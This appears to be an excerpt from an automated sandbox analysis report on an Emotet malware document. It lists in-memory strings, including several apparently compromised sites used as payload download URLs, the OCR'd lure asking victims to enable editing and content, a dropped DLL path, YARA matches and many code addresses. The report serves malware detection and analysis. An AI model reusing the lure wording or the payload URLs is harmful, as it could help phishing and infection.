Source: powershell.exe, 00000005.00000002.2139305270.0000000002470000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2143212470.0000000002770000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2144888495.0000000002780000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.2164826084.0000000002860000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2139305270.0000000002470000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2143212470.0000000002770000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2144888495.0000000002780000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.2164826084.0000000002860000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/cclea
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp	String found in binary or memory: http://zenithcampus.com
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: http://zenithcampus.com/l/yQ/
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://football-eg.com/web_map/n/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://johnhaydenwrites.com/track_url/P/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://nahlasolimandesigns.com/nahla3/d/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://vietnhabienhoa.com/wordpress/QUTy/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp	String found in binary or memory: https://vietnhabienhoa.com/wordpress/QUTy/P
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://zenithcampus.com/wp-json/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000F.00000002.2153905031.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155916188.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150770541.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147679834.0000000000311000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162568948.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141920127.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2159102288.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2358984806.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155772363.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157336614.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143541090.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147601789.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150877098.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141994054.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162462473.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2149091905.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146032293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146169134.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2153961508.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152298877.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2158760347.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 7696
Source: unknown	Process created: Commandline size = 7605
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7605	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_004AF3A1 DeleteService,

12_2_004AF3A1

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Yozs\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100135DE	7_2_100135DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019081	7_2_10019081
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C0D0	7_2_1000C0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C228	7_2_1000C228
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000BA3C	7_2_1000BA3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001A30D	7_2_1001A30D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CB34	7_2_1000CB34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019B65	7_2_10019B65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000EB85	7_2_1000EB85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D39E	7_2_1000D39E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E3E0	7_2_1000E3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B4F3	7_2_1001B4F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100195F3	7_2_100195F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C71C	7_2_1000C71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CF69	7_2_1000CF69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A6005	7_2_001A6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B1079	7_2_001B1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AE871	7_2_001AE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B0065	7_2_001B0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B1913	7_2_001B1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A510E	7_2_001A510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B5136	7_2_001B5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A415F	7_2_001A415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B41AD	7_2_001B41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A2A18	7_2_001A2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A0A00	7_2_001A0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B2A00	7_2_001B2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B8279	7_2_001B8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001ACA68	7_2_001ACA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A6A6F	7_2_001A6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A628A	7_2_001A628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001C12B6	7_2_001C12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B02A0	7_2_001B02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B6AD5	7_2_001B6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AD2C9	7_2_001AD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A8B16	7_2_001A8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AFB05	7_2_001AFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A8355	7_2_001A8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B4B48	7_2_001B4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A1B46	7_2_001A1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B2B45	7_2_001B2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AE380	7_2_001AE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AF3B5	7_2_001AF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A33AB	7_2_001A33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A5BAC	7_2_001A5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AABF8	7_2_001AABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B9BE4	7_2_001B9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A3C28	7_2_001A3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A7C4A	7_2_001A7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AC44B	7_2_001AC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B4460	7_2_001B4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AE499	7_2_001AE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B9494	7_2_001B9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BC48F	7_2_001BC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001ABCA5	7_2_001ABCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B5CCB	7_2_001B5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AA4E1	7_2_001AA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A6D2C	7_2_001A6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A3521	7_2_001A3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001ADD24	7_2_001ADD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BBD5E	7_2_001BBD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B7D78	7_2_001B7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BB59B	7_2_001BB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BA59F	7_2_001BA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A7D94	7_2_001A7D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A4DB8	7_2_001A4DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A75A0	7_2_001A75A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B2DE1	7_2_001B2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001C1600	7_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B6E50	7_2_001B6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A367A	7_2_001A367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B1E7D	7_2_001B1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A5EBA	7_2_001A5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A06B6	7_2_001A06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B66AE	7_2_001B66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B06D1	7_2_001B06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AC6CE	7_2_001AC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B96EA	7_2_001B96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B8EE2	7_2_001B8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A6EE4	7_2_001A6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B7713	7_2_001B7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AEF04	7_2_001AEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B473C	7_2_001B473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AAF28	7_2_001AAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001ACF5B	7_2_001ACF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A5742	7_2_001A5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AD760	7_2_001AD760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B4F60	7_2_001B4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A2F97	7_2_001A2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BBFB0	7_2_001BBFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AA7A2	7_2_001AA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AB7C2	7_2_001AB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A77F0	7_2_001A77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A27F4	7_2_001A27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C6C05	9_2_001C6C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C6E8A	9_2_001C6E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C9716	9_2_001C9716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CFB04	9_2_001CFB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D533C	9_2_001D533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C4121	9_2_001C4121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D5748	9_2_001D5748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CE360	9_2_001CE360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DC19B	9_2_001DC19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D4DAD	9_2_001D4DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C83F0	9_2_001C83F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DA7E4	9_2_001DA7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C3618	9_2_001C3618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C1600	9_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D3600	9_2_001D3600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C4828	9_2_001C4828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D7A50	9_2_001D7A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C884A	9_2_001C884A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CD04B	9_2_001CD04B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D2A7D	9_2_001D2A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D1C79	9_2_001D1C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D8E79	9_2_001D8E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C427A	9_2_001C427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CF471	9_2_001CF471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C766F	9_2_001C766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CD668	9_2_001CD668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D0C65	9_2_001D0C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D5060	9_2_001D5060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CF099	9_2_001CF099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DA094	9_2_001DA094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DD08F	9_2_001DD08F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C6ABA	9_2_001C6ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C12B6	9_2_001C12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D72AE	9_2_001D72AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CC8A5	9_2_001CC8A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D0EA0	9_2_001D0EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D76D5	9_2_001D76D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D12D1	9_2_001D12D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CD2CE	9_2_001CD2CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CDEC9	9_2_001CDEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D68CB	9_2_001D68CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DA2EA	9_2_001DA2EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C7AE4	9_2_001C7AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CB0E1	9_2_001CB0E1
